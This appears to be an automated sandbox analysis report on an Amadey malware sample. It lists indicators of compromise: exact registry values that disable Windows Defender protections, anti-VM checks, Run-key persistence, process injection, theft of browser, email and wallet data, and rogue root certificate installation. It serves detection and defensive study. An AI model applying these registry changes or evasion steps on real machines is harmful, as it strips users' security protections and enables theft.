amadey | 899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	f8860f532a.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

defense_evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	f8860f532a.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	f8860f532a.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	f8860f532a.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	f8860f532a.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	f8860f532a.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	f8860f532a.exe

Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	f8860f532a.exe

Modifies Windows Defender notification settings 3 TTPs 2 IoCs

defense_evasion trojan

Windows Service

Modify Registry

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	f8860f532a.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	f8860f532a.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ae09e8f5c6.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	FvbuInU.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempIWOF65VQKRBXHEK95HTKNKEK3DNZ6OAU.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	20b1824b6e.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	696151d304.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	784126e897.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	f8860f532a.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	v6Oqdnc.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	099b641ade.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
6	772	powershell.exe
7	992	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1628	powershell.exe
4888	powershell.exe
4664	powershell.exe
5336	powershell.exe
1928	powershell.exe
2420	powershell.exe
868	powershell.exe
772	powershell.exe
992	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 20 IoCs

flow	pid	Process
7	992	powershell.exe
5	2664	rapes.exe
5	2664	rapes.exe
5	2664	rapes.exe
5	2664	rapes.exe
5	2664	rapes.exe
5	2664	rapes.exe
5	2664	rapes.exe
5	2664	rapes.exe
5	2664	rapes.exe
5	2664	rapes.exe
11	2508	BitLockerToGo.exe
15	772	BitLockerToGo.exe
119	2664	rapes.exe
119	2664	rapes.exe
119	2664	rapes.exe
132	2664	rapes.exe
132	2664	rapes.exe
132	2664	rapes.exe
6	772	powershell.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

.NET Reactor proctector 2 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/files/0x0006000000019625-3394.dat	net_reactor
behavioral1/memory/2316-3407-0x0000000000AE0000-0x0000000000B40000-memory.dmp	net_reactor

Checks BIOS information in registry 2 TTPs 24 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	f8860f532a.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	v6Oqdnc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempIWOF65VQKRBXHEK95HTKNKEK3DNZ6OAU.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	784126e897.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	v6Oqdnc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	FvbuInU.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	FvbuInU.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	20b1824b6e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	20b1824b6e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ae09e8f5c6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempIWOF65VQKRBXHEK95HTKNKEK3DNZ6OAU.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	099b641ade.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	f8860f532a.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	099b641ade.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ae09e8f5c6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	696151d304.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	696151d304.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	784126e897.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbs	AhFKwnS.exe

Executes dropped EXE 36 IoCs

pid	Process
2664	rapes.exe
2900	ce4pMzk.exe
1416	7c581e7a04.exe
1568	TempIWOF65VQKRBXHEK95HTKNKEK3DNZ6OAU.EXE
2880	483d2fa8a0d53818306efeb32d3.exe
2788	20b1824b6e.exe
3040	f995140a63.exe
1912	f995140a63.exe
636	f995140a63.exe
296	f995140a63.exe
2460	099b641ade.exe
1672	AhFKwnS.exe
1184	ae09e8f5c6.exe
3456	696151d304.exe
908	784126e897.exe
4848	1566acddfa.exe
920	f8860f532a.exe
4048	AhFKwnS.exe
6812	v6Oqdnc.exe
7148	OEHBOHk.exe
4312	MCxU5Fj.exe
4364	MCxU5Fj.exe
2124	Y87Oyyz.exe
2236	Y87Oyyz.exe
2892	SplashWin.exe
2776	SplashWin.exe
3368	ce4pMzk.exe
472	Process not Found
4648	ckonftponqgz.exe
2316	mAtJWNv.exe
1432	mAtJWNv.exe
3108	mAtJWNv.exe
5564	SvhQA35.exe
5840	chromium.exe
2248	FvbuInU.exe
6548	Ps7WqSx.exe

Identifies Wine through registry keys 2 TTPs 12 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine	TempIWOF65VQKRBXHEK95HTKNKEK3DNZ6OAU.EXE
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine	FvbuInU.exe
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine	899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine	20b1824b6e.exe
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine	099b641ade.exe
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine	ae09e8f5c6.exe
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine	696151d304.exe
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine	784126e897.exe
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine	f8860f532a.exe
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine	v6Oqdnc.exe

Loads dropped DLL 64 IoCs

pid	Process
2412	899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe
2664	rapes.exe
2664	rapes.exe
772	powershell.exe
772	powershell.exe
992	powershell.exe
992	powershell.exe
2664	rapes.exe
2664	rapes.exe
2664	rapes.exe
3040	f995140a63.exe
3040	f995140a63.exe
3040	f995140a63.exe
2368	WerFault.exe
2368	WerFault.exe
2368	WerFault.exe
2368	WerFault.exe
2368	WerFault.exe
628	WerFault.exe
628	WerFault.exe
628	WerFault.exe
628	WerFault.exe
628	WerFault.exe
2664	rapes.exe
2664	rapes.exe
2664	rapes.exe
5076	WerFault.exe
5076	WerFault.exe
5076	WerFault.exe
5076	WerFault.exe
5076	WerFault.exe
2664	rapes.exe
2664	rapes.exe
2664	rapes.exe
2664	rapes.exe
3920	WerFault.exe
3920	WerFault.exe
3920	WerFault.exe
2664	rapes.exe
2664	rapes.exe
2508	BitLockerToGo.exe
2664	rapes.exe
2664	rapes.exe
2664	rapes.exe
2664	rapes.exe
772	BitLockerToGo.exe
6708	WerFault.exe
6708	WerFault.exe
6708	WerFault.exe
6708	WerFault.exe
6708	WerFault.exe
2664	rapes.exe
2664	rapes.exe
6984	WerFault.exe
6984	WerFault.exe
6984	WerFault.exe
2664	rapes.exe
2664	rapes.exe
2664	rapes.exe
4312	MCxU5Fj.exe
4552	WerFault.exe
4552	WerFault.exe
4552	WerFault.exe
4552	WerFault.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Windows security modification 2 TTPs 2 IoCs

defense_evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features	f8860f532a.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	f8860f532a.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\7c581e7a04.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10105750101\\7c581e7a04.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10105760121\\am_no.cmd"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\CMnYnzVl\\Anubis.exe\""	ce4pMzk.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\696151d304.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10106210101\\696151d304.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\784126e897.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10106220101\\784126e897.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\1566acddfa.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10106230101\\1566acddfa.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\f8860f532a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10106240101\\f8860f532a.exe"	rapes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
3660	powercfg.exe
3220	powercfg.exe
5088	powercfg.exe
5048	powercfg.exe
4992	powercfg.exe
4976	powercfg.exe
3916	powercfg.exe
3872	powercfg.exe

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0005000000019441-42.dat	autoit_exe
behavioral1/files/0x000500000001a4ca-1722.dat	autoit_exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	ckonftponqgz.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	OEHBOHk.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs

pid	Process
2412	899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe
2664	rapes.exe
1568	TempIWOF65VQKRBXHEK95HTKNKEK3DNZ6OAU.EXE
2880	483d2fa8a0d53818306efeb32d3.exe
2788	20b1824b6e.exe
2460	099b641ade.exe
1184	ae09e8f5c6.exe
3456	696151d304.exe
908	784126e897.exe
920	f8860f532a.exe
6812	v6Oqdnc.exe
2248	FvbuInU.exe

Suspicious use of SetThreadContext 8 IoCs

description	pid	Process	procid_target
PID 3040 set thread context of 296	3040	f995140a63.exe	63
PID 2788 set thread context of 2508	2788	20b1824b6e.exe	66
PID 2460 set thread context of 772	2460	099b641ade.exe	71
PID 4312 set thread context of 4364	4312	MCxU5Fj.exe	105
PID 2776 set thread context of 340	2776	SplashWin.exe	114
PID 4648 set thread context of 1536	4648	ckonftponqgz.exe	144
PID 4648 set thread context of 2268	4648	ckonftponqgz.exe	150
PID 2316 set thread context of 3108	2316	mAtJWNv.exe	154

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4284	sc.exe
4440	sc.exe
4572	sc.exe
4588	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 9 IoCs

pid	pid_target	Process	procid_target
2368	3040	WerFault.exe	60
628	296	WerFault.exe	63
5076	1672	WerFault.exe	69
3920	3456	WerFault.exe	74
6708	4048	WerFault.exe	99
6984	6812	WerFault.exe	101
4552	4312	WerFault.exe	104
1864	4364	WerFault.exe	105
4848	2316	WerFault.exe	152

System Location Discovery: System Language Discovery 1 TTPs 50 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f995140a63.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	099b641ade.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Y87Oyyz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SplashWin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	696151d304.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	784126e897.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AhFKwnS.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MCxU5Fj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mAtJWNv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mAtJWNv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FvbuInU.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ps7WqSx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Y87Oyyz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MCxU5Fj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7c581e7a04.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ae09e8f5c6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	20b1824b6e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f995140a63.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1566acddfa.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	1566acddfa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	v6Oqdnc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AhFKwnS.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	1566acddfa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f8860f532a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SplashWin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe

Delays execution with timeout.exe 1 IoCs

pid	Process
2520	timeout.exe

Kills process with taskkill 5 IoCs

pid	Process
4888	taskkill.exe
5032	taskkill.exe
3512	taskkill.exe
2948	taskkill.exe
1056	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

defense_evasion spyware trojan

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 60d5ebc5078edb01	powershell.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_Classes\Local Settings	firefox.exe

Modifies system certificate store 2 TTPs 5 IoCs

Install Root Certificate

T1553.004

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	FvbuInU.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	FvbuInU.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	ae09e8f5c6.exe
